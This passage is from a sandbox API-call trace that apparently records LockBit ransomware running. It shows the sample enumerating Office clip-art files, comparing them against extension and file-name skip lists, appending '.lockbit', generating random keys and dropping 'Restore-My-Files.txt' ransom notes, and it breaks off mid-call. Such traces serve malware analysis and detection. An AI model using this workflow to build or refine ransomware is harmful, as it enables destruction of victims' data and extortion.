lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.512] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.512] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.513] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.513] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.513] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.513] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.513] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.513] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.513] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.513] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.513] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.513] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.513] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.513] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107282.WMF") returned 1 [0141.513] lstrcmpiW (lpString1="ntldr", lpString2="J0107282.WMF") returned 1 [0141.513] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107282.WMF") returned 1 [0141.513] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107282.WMF") returned -1 [0141.513] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107282.WMF") returned -1 [0141.513] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107282.WMF") returned 1 [0141.513] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107282.WMF") returned -1 [0141.513] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.513] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF") returned=".WMF" [0141.513] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.513] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.514] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.514] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.515] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.515] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.515] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.515] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.515] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.515] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.515] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.515] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.515] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF.lockbit") returned 72 [0141.515] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107282.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0141.516] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.516] malloc (_Size=0x40068) returned 0x3d70450 [0141.516] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=14132) returned 1 [0141.516] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0141.517] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0141.517] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0141.522] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.522] malloc (_Size=0xa6) returned 0x77d7a8 [0141.522] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.523] free (_Block=0x77d7a8) [0141.523] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107282.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.523] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.523] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.524] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x347c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107288.WMF", cAlternateFileName="")) returned 1 [0141.524] lstrcmpiW (lpString1=".", lpString2="J0107288.WMF") returned -1 [0141.524] lstrcmpiW (lpString1="..", lpString2="J0107288.WMF") returned -1 [0141.524] PathFindExtensionW (pszPath="J0107288.WMF") returned=".WMF" [0141.524] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.524] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.525] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.525] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.526] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.526] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.526] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.526] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.526] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.526] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.526] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107288.WMF") returned 1 [0141.526] lstrcmpiW (lpString1="ntldr", lpString2="J0107288.WMF") returned 1 [0141.526] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107288.WMF") returned 1 [0141.526] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107288.WMF") returned -1 [0141.526] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107288.WMF") returned -1 [0141.526] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107288.WMF") returned 1 [0141.526] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107288.WMF") returned -1 [0141.526] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.526] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF") returned=".WMF" [0141.526] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.526] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.526] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.526] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.526] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.526] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.526] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.527] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.527] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF.lockbit") returned 72 [0141.528] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107288.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0141.528] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.528] malloc (_Size=0x40068) returned 0x3e70008 [0141.529] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=13436) returned 1 [0141.529] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.529] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0141.539] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.540] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.540] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0141.540] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0141.546] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0141.546] malloc (_Size=0xa6) returned 0x77d7a8 [0141.546] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0141.547] free (_Block=0x77d7a8) [0141.547] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107288.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0141.547] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0141.547] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0141.547] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3014, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107290.WMF", cAlternateFileName="")) returned 1 [0141.547] lstrcmpiW (lpString1=".", lpString2="J0107290.WMF") returned -1 [0141.547] lstrcmpiW (lpString1="..", lpString2="J0107290.WMF") returned -1 [0141.547] PathFindExtensionW (pszPath="J0107290.WMF") returned=".WMF" [0141.548] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0141.548] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0141.549] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0141.549] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0141.550] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0141.550] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0141.550] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0141.550] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0141.550] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0141.550] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0141.550] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0141.550] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107290.WMF") returned 1 [0141.550] lstrcmpiW (lpString1="ntldr", lpString2="J0107290.WMF") returned 1 [0141.550] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107290.WMF") returned 1 [0141.550] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107290.WMF") returned -1 [0141.550] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107290.WMF") returned -1 [0141.550] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107290.WMF") returned 1 [0141.550] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107290.WMF") returned -1 [0141.550] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0141.550] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF") returned=".WMF" [0141.550] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0141.550] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0141.550] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0141.550] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0141.550] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0141.551] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0141.552] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0141.552] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0141.552] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0141.552] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF.lockbit") returned 72 [0141.552] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107290.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107290.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0141.553] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0141.553] malloc (_Size=0x40068) returned 0x3ef0008 [0141.553] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=12308) returned 1 [0141.553] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.553] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0141.554] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0141.554] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0141.554] 